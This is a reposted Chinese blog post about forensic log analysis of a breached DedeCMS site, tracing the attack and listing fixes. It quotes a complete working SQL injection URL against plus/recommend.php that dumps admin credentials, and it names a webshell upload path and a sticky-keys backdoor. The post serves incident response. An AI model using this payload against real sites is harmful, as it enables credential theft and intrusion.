一次简单的日志分析

最新推荐文章于 2022-04-01 20:12:59 发布
最新推荐文章于 2022-04-01 20:12:59 发布
阅读量159 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/xiaoyunxiaogang/p/10969170.html
版权

从开始审计日志(200状态码)发现sql注入payload

 

 

利用一下该payload确定该网站存在sql注入,且攻击者利用该漏洞获取到了后台账户以及密码

注入点:http://192.168.31.35/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=

 

Payload:

http://192.168.31.35/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294

 

 

 攻击者在

[27/May/2019:15:50:07 +0800]到

 

27/May/2019:15:50:09 +0800]

进行了后台扫描

再翻看日志发现文件上传漏洞存在

url:/dede/file_manage_main.php?activepath=/uploads

此处存在任意文件上传漏洞且攻击者成功上传PHP大马

 

 

发现存在隐藏账户,并且留有5shift后门

 

 

 

 

修复方案:

1、删除后门、

2、全局优化文件上传限制,改为白名单上传

4、对URL进行转码编译

5、增强密码难度,使用更安全的加密手段

6、在代码层面进行优化,严格判断文件及变量参数的引入,防止未知文件被包含产生威胁

升级cms版本、mysql版本、

 

升级优化之后

 

 

转载于:https://www.cnblogs.com/xiaoyunxiaogang/p/10969170.html

weixin_34178244
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
简学-常见日志分析
码农米格的博客
03-29 244
常见的日志查询方式Windows日志位置:`%SystemRoot%\System32\Winevt\logs\...`日志查询方式:Linux日志位置:-------------------------------shell 快捷命令查询日志方式:中间件Apache:IIS:Weblogic:Tomcat: Windows 日志位置:%SystemRoot%\System32\Winevt\logs\... 应用程序日志:%SystemRoot%\System32\Winevt\logs\Applic
简单的Web日志分析
weixin_43988774的博客
04-14 5100
Web日志分析 以apache为例 访问日志记录过程 apache日志大致分为两类:访问日志和错误日志 访问日志记录的过程: 客户端向web服务器发送请求,请求中包含客户端的IP、浏览器类型(User-Agent)、请示的URL等信息 web服务器向客户端返回请示的页面 web服务器同时将访问信息和状态信息记录到日志文件中 Apache的访问日志目录在其配置文件中已经定义好了,CentOS中apache的配置文件位置为/etc/httpd/conf/httpd.
一次简单日志分析
weixin_30877181的博客
11-15 259
题目文件:https://files.cnblogs.com/files/nul1/access.log.tar 直接搜索flag发现是一题关于二分法注入。 页面为200的字节大小为1765,所以可以通过读取每行判断是否有1765以及有没有flag的关键字样,进而提取值。 脚本如下所示: # coding:utf-8 import re import urlli...
基础题目之日志分析
king丶
07-31 710
通过下载日志,已知线索ip:172.16.12.12 利用Notepad++ 正则 匹配到 我们知道的ip地址 已经状态码 200 的 172.16.12.12 .*".*" 200 发现攻击者一直在adminlogin.php 页面请求。 发现是个登陆框。 导入字典爆破 密码为password123 ...
DedeCMS Xss+Csrf Getshell \dede\file_manage_control.php
weixin_30877227的博客
01-21 196
目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 对这个漏洞的利用方式进行简单的概括 1. 这个漏洞的利用前提是需要登录到后台进行操作,准确来说是从cookies的角度来说是需要处于登录的后台状态 2. 后台的Logo上传存在xss漏洞,黑客可以在img的src中注入xss的代码 ...
记录一次ssh日志分析和apache日志分析
05-25
记录一次ssh日志分析和apache日志分析
大数据综合案例-网站日志分析
12-28
"大数据综合案例-网站日志分析" 大数据综合案例-网站日志分析,主要是文档,使用大数据离线分析日志。以下是对该项目的详细解读和知识点总结: 项目介绍 该项目的目的是通过对技术学习论坛的 Apache Common 日志...
Shell日志分析常用命令和例子
09-15
这比`cat`命令更实用,因为`less`允许上下滚动,而`cat`一次性显示整个文件内容。 2. **cat**: `cat 文件名` 直接显示文件内容,`| cat 1.log 2.log` 可以合并多个文件显示。`cat`常用于文件的连接操作。 3. **...
服务器日志数据分析1
08-04
首先,我们从描述中了解到,日志文件`log.txt`记录了一个API的调用情况,每分钟一次,包含调用次数、响应时间等信息。数据集大约包含18万条记录。 1. 导入数据与数据清洗: 使用pandas库的`read_table`函数读取...
Python实现的大数据分析操作系统日志功能示例
09-19
首先,面对大规模的日志文件,直接一次性读入内存可能会导致资源消耗过大。为了解决这个问题,我们可以使用Python进行大文件的切分。如代码1所示,定义了一个名为`FileSplit`的函数,该函数接收源文件路径和目标...
10个好用的Web日志安全分析工具推荐小结
10-15
一款简单好用的Web日志分析工具,可以大大提升效率,目前业内日志分析工具比较多,今天推荐十个比较好用的Web日志安全分析工具。感兴趣的同学可以收藏一下
日志分析方法
热门推荐
foolisheddy
06-03 2万+
日志分析方法 日志分析方法 分析方法: 1.特征字符分析(Signature-based): 2.访问频率分析(Frequency analysis) 1.漏洞扫描检测: 2.暴力破解检测: 3.webshell 检测 难点: 风险评估模型: 参考: 分析方法: 1.特征字符分析(Signature-based): 在日志中查找已知的漏洞特征,去发现黑客攻击行为,...
简单日志分析流程
super__dreamer的博客
09-16 1381
简单日志分析流程 使用Flume采集数据到HDFS上 对数据进行清洗(可以使用MapReduce程序来清洗) 在Hive上创建相应的表加载清洗后的数据,然后使用Hive对清洗后的数据进行多维分析 把Hive分析得的结果通过Sqoop导到Mysql中 提供视图工具供用户使用(可以自己写Web程序来访问Mysql) 备注:这边的日志分析最好通过写shell程序结合定时器crontab来完成。不可能
(六)Hadoop实现简单日志分析
tjpuliang的专栏
04-01 5693
1)创建Maven项目 2)引入依赖 3)编写Hadoop 日志分析相关Job代码 4)导jar包 5)上传到Hadoop 集群 6)编写Hadoop jar包执行jar包 7)手动执行验证 8)使用后台系统远程手动实现分析 9)使用定时任务实现定时分析 ...
一款全面高效的日志分析工具,操作更简单
weixin_42434696的博客
08-16 6854
    一款全面高效的日志分析工具,操作更简单     Eventlog Analyzer是用来分析和审计系统及事件日志的管理软件,能够对全网范围内的主机、服务器、网络设备、数据库以及各种应用服务系统等产生的日志,进行全面收集和细致分析,通过统一的控制台进行实时可视化的呈现。通过定义日志筛选规则和策略,帮助IT管理员从海量日志数据中精确查找关键有用的事件数据,准确定位网络故障并提前识别安全威胁,从...
3306 mysql弱口令源码_玩蟹游戏漏洞打包(shell+SQL+mysql弱口令+源码泄漏)
weixin_33512961的博客
01-19 5443
DEDECMSSQL注入1.http://luanshiqu.playcrab.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c...
搭建一个简单的日志实时分析平台---ELK
小强签名设计 的博客
01-09 9079
一、前言    人们常常说数据如金,可是,能被利用起的数据,才是“金”。而互联网的数据,常常以日志的媒介的形式存在,并需要从中提取其中的"数据"。    从这些数据中,我们可以做用户画像(每个用户都点了什么广告,对哪些开源技术感兴趣),安全审计,安全防护(如果1小时内登录请求数到达一定值就报警),业务数据统计(如开源中国每天的博客数是多少,可视化编辑格式和markdown格式各占比例是多少)等等。...
Linux 下统计用户登录时长——日志分析
wwv386646959的专栏
05-16 2553
有时候,需要统计每个用户登录的时长。我最开始做这件事情的时候也花费了不少时间。主要是我所用到的服务器用户太多,有一千多人,写好的程序要执行将近半个小时才统计完成。我使用的服务器是Debian,内核版本为2.6.32         服务器登录模块采用{PAM+Mysql数据库的模式,每个用户都有一个用以分组的属性,这个属性是class,我写的脚本就是以class来进行分类的。
日志分析总结
芮敏的博客
03-30 2189
整机开发中日志分这几种 1、bugreport ANR信息、版本信息、手机型号 2、device JAVA层的日志信息 3、kernel CPU的使用情况、内存的使用情况 4、radio 网络使用情况 5、event ActivityManager 活动管理类 ServiceManager 点击事件日志具体分析方法 1、PID、UID PID表示每个进程 每个进
P1165 日志分析
最新发布
05-27
P1165 日志分析是一道题目,通常指的是洛谷网站上的一道题目。该题的任务是对一些日志进行分析,找其中现次数最多的 IP 地址,如果有多个 IP 地址现的次数相同,输字典序最小的那个。 算法思路可以使用哈希...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值